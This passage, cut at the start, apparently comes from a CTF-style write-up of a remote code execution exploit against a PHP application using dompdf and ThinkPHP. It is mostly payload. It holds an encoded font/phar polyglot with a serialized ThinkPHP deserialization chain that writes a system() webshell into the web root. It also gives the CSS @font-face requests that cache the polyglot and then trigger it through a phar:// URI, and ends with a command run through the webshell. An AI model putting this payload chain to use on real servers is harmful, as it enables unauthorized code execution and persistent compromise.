GxlZDFVbnRpdGxlZDFWZXJzaW9uIDAwMS4wMDBWZXJzaW9uIDAwMS4wMDBVbnRpdGxlZDFVbnRpdGxlZDHvv73vv70y77%252B977%252B977%252B977%252B977%252B9de%252B%252FvW5L77%252B977%252B9bkvvv70KPD9waHAgX19IQUxUX0NPTVBJTEVSKCk7ID8%252BDQpVCgAAAQAAABEAAAABAAAAAAAfCgAATzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6NTp7czo5OiIAKgBhcHBlbmQiO2E6MTp7aTowO3M6ODoiZ2V0RXJyb3IiO31zOjg6IgAqAGVycm9yIjtPOjI3OiJ0aGlua1xtb2RlbFxyZWxhdGlvblxIYXNPbmUiOjM6e3M6MTU6IgAqAHNlbGZSZWxhdGlvbiI7YjowO3M6ODoiACoAcXVlcnkiO086MTQ6InRoaW5rXGRiXFF1ZXJ5IjoxOntzOjg6IgAqAG1vZGVsIjtPOjIwOiJ0aGlua1xjb25zb2xlXE91dHB1dCI6Mjp7czoyODoiAHRoaW5rXGNvbnNvbGVcT3V0cHV0AGhhbmRsZSI7TzozMDoidGhpbmtcc2Vzc2lvblxkcml2ZXJcTWVtY2FjaGVkIjoyOntz
OjEwOiIAKgBoYW5kbGVyIjtPOjI3OiJ0aGlua1xjYWNoZVxkcml2ZXJcTWVtY2FjaGUiOjM6e3M6MTA6IgAqAG9wdGlvbnMiO2E6NTp7czo2OiJleHBpcmUiO2k6MDtzOjEyOiJjYWNoZV9zdWJkaXIiO2I6MDtzOjY6InByZWZpeCI7czowOiIiO3M6NDoicGF0aCI7czowOiIiO3M6MTM6ImRhdGFfY29tcHJlc3MiO2I6MDt9czoxMDoiACoAaGFuZGxlciI7TzoxMzoidGhpbmtcUmVxdWVzdCI6Mjp7czo2OiIAKgBnZXQiO2E6MTp7czoxODoiSEVYRU5TPGdldEF0dHI%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%252BJyA%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%252FcGhwIHN5c3RlbSgpOyA%252FPicgPiAvdmFyL3d3dy9odG1sL3B1YmxpYy8xLnBocCI7fXM6OToiACoAZmlsdGVyIjtzOjY6InN5c3RlbSI7fXM6NjoiACoAdGFnIjtiOjE7fXM6OToiACoAY29uZmlnIjthOjc6e3M6NDoiaG9zdCI7czo5OiIxMjcuMC4wLjEiO3M6NDoicG9ydCI7aToxMTIxMTtzOjY6ImV4cGlyZSI7aTozNjAwO3M6NzoidGltZW91dCI7aTowO3M6MTI6InNlc3Npb25fbmFtZSI7czo2OiJIRVhFTlMiO3M6ODoidXNlcm5hbWUiO3M6MDoiIjtzOjg6InBhc3N3b3JkIjtzOjA6IiI7fX1zOjk6IgAqAHN0eWxlcyI7YToxOntpOjA7czo3OiJnZXRBdHRyIjt9fX19fX0IAAAAdGVzdC50eHQEAAAAthRJZAQAAAAMfn%252FYpAEAAAAAAAB0ZXN022l2ia1yjzHI4j9%252F%252FNeso0pc1gcCAAAAR0JNQg%253D%253D');
font-weight:'normal';
font-style:'normal';
}
</style>

====== REQUEST 2 NOT ENCODED =======

<style>
@font-face {
font-family:'exploit';
src:url('phar:///var/www/html/vendor/dompdf/dompdf/lib/fonts/exploit_normal_da94a27b825aeca64e86b19a3972972d.ttf##');
font-weight:'normal';
font-style:'normal';
}
</style>

Send the REQUEST 1 ENCODED body (above) first. dompdf fetches the data: URI, accepts it as a font and writes the polyglot into vendor/dompdf/dompdf/lib/fonts/ under the exploit_normal_<md5>.ttf name the script computed.

The POST parameter is named content because auditing the source shows:

[screenshot]

[screenshot]

[screenshot]

With that known, POST the parameter:

[screenshot]

Then POST the second payload, REQUEST 2 ENCODED (above). Its phar:// URI makes getFileContent open the archive, which triggers the phar deserialization, runs the ThinkPHP chain and writes the webshell.

Then just browse to 1.php?0=ls.

Reference: think PHP pdf rce